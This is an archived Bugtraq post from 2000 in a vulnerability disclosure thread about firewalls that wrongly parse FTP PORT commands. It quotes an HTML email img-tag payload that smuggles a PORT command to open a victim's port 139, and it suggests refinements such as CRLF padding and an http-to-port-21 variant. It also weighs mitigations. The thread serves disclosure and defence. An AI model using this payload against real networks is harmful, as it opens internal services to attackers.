Bugtraq mailing list archives
Re: Extending the FTP "ALG" vulnerability to any FTP client
From: solar () FALSE COM (Solar Designer)
Date: Sun, 12 Mar 2000 05:41:55 +0300
Hello,
* Send a HTML email to an HTML-enabled mail reader
containing the tag
<img src="ftp://ftp.rooted.com/aaaa[lots of A]aaaPORT 1,2,3,4,0,139">
I was playing with that recently as well. Yes, this works. Some browsers add an extra "/" to such requests (at least on the first check, for a directory), so one might want to add %0d%0a to the end. It's also important that this is either an ftp URL, or some other text-based protocol directed to 21/tcp (such as, http://server:21).
* Balance the number of A so that the PORT command will begin
on a new packet boundary. This may also be done by having
the server use a low TCP MSS to decrease the number of A's that
one has to add.
This is not always necessary. Linux's ip_masq_ftp module is happy to detect PORT anywhere in packets travelling to 21/tcp.
* The firewall in question will incorrectly parse the resulting
RETR /aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139
as first a RETR command and then a PORT command and open
port 139 against your address (1.2.3.4 in this case)
It will also translate the PORT command, so that ftp.rooted.com sees the firewall's IP address and port number that's currently redirected to client:139.
* Disable active FTP. Errrr, wait. The fix for the server side
vulnerability was to disable passive FTP. Let's rephrase that:
* Disable FTP altogether. Block port 21. Disable FTP Application
Layer Filters on all ports in your firewall.
There's a partial workaround: only allow access to non-privileged ports. Yes, there can still be vulnerable services on those. :-( I haven't tested if this would work with real-world FTP clients on Win32 -- are there any that would use privileged ports?
* If you can't change the settings in your firewall, set the
"FTP Proxy" setting in your browser/HTML-enabled mail reader
to some address that doesn't exist, like 127.0.0.2. After
this change, your browser won't be able to connect anywhere
using FTP.
That doesn't help against the http://...:21 trick. Signed, Solar Designer
Current thread:
- Extending the FTP "ALG" vulnerability to any FTP client Mikael Olsson (Mar 10)
- Re: Extending the FTP "ALG" vulnerability to any FTP client Mitchell Blank Jr (Mar 11)
- Re: Extending the FTP "ALG" vulnerability to any FTP client Mikael Olsson (Mar 11)
- Re: Extending the FTP "ALG" vulnerability to any FTP client Darren Reed (Mar 14)
- Microsoft Security Bulletin (MS00-017) Microsoft Product Security (Mar 16)
- Cisco Security Notice: Cisco Secure PIX Firewall FTP Vulnerabilities security-alert () CISCO COM (Mar 16)
- Microsoft Security Bulletin (MS00-016) Microsoft Product Security (Mar 17)
- Re: Extending the FTP "ALG" vulnerability to any FTP client Solar Designer (Mar 11)
- <Possible follow-ups>
- Re: Extending the FTP "ALG" vulnerability to any FTP client Dug Song (Mar 11)
- Re: Extending the FTP "ALG" vulnerability to any FTP client Mitchell Blank Jr (Mar 11)